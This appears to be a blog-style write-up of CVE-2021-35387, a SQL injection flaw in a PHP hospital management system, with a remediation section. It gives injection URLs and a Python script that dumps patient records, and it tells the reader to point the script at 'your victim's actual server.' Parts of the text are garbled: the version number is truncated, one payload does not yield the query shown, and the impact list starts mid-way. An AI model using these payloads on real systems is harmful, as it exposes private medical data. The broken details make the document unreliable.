When it comes to healthcare software, security should be a top priority. Unfortunately, some systems have serious flaws that can put sensitive information at risk. In this article, we take a closer look at CVE-2021-35387 — a SQL Injection vulnerability found in the popular Hospital Management System v4. (Enterprise – PHP project) that could let attackers read or even change vital medical data.

We will explain the vulnerability, show sample exploit code, and provide links for further reading. All technical details are kept straightforward for easy understanding.

What is Hospital Management System v4.?

This is a web-based platform used by clinics, hospitals, and doctors for managing patient information, appointments, billing, and much more. It’s commonly available on code sharing sites (like PHPGurukul) and is often self-hosted by institutions.

CVE-2021-35387 refers to a security vulnerability found in the file

hospital/hms/admin/view-patient.php

in version 4. of the system. Due to insufficient input validation, attackers can inject malicious SQL code and access the underlying database.

Original Advisory

- CVE Details
- Exploit DB
- NVD

The Vulnerable Code Explained

In view-patient.php, the script takes a field from user input and adds it right into a SQL query without any checks or sanitization. Here’s a simplified snippet:

<?php
// From hospital/hms/admin/view-patient.php

$viewid = $_GET['viewid'];
$sql = "SELECT * FROM tblpatient WHERE ID='$viewid'";
$result = mysqli_query($con, $sql);
?>

Notice, the $viewid variable comes right from $_GET, so anything the user enters in the viewid URL parameter is directly inserted into the SQL query.

How Attackers Exploit This

By providing a crafted viewid parameter in the URL, attackers can control the SQL statement. For instance, visiting the URL:

http://target-site/hospital/hms/admin/view-patient.php?viewid=1'; OR '1'='1

The SQL query becomes

SELECT * FROM tblpatient WHERE ID='1' OR '1'='1'

Here, '1'='1' is always true, so the database returns all patient records instead of just one.

Attackers can go further, for example

http://target-site/hospital/hms/admin/view-patient.php?viewid=1'; UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

This payload abuses the UNION SQL operator to show database version information.

Here’s a short Python script that automates the attack and dumps patient data

import requests

target = 'http://target-site/hospital/hms/admin/view-patient.php';
payload = "' OR 1=1-- "

params = {'viewid': payload}
r = requests.get(target, params=params)

if "Patient Details" in r.text:
    print("[+] Success! Dumped Patients data below:")
    print(r.text)
else:
    print("[-] Exploit failed or site not vulnerable.")

Replace target-site with your victim’s actual server.

Ransomware: Malicious actors could change or encrypt records, demanding payment for restoration.

- Wider Breaches: If patient records include emails or passwords, additional attacks become possible.

How To Fix?

NEVER directly insert user input into SQL queries. Use prepared statements or input sanitization:

$stmt = $con->prepare("SELECT * FROM tblpatient WHERE ID=?");
$stmt->bind_param("i", $_GET['viewid']);
$stmt->execute();

Alternatively, always cast such values to integers

$viewid = intval($_GET['viewid']);
$sql = "SELECT * FROM tblpatient WHERE ID='$viewid'";

Final Thoughts

Software for hospitals and health clinics must be extra safe. CVE-2021-35387 shows how simple coding mistakes can create huge privacy and security risks in critical systems. If you use or develop medical software, always test, sanitize, and update your apps against the latest threats.

References

- Exploit-DB: 50227
- Original Product – PHPGurukul

Stay safe, patch your systems, and respect patient privacy!

> *Do not run this exploit against servers you don't own! Unauthorized use is illegal.*

Timeline

Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:31:00 UTC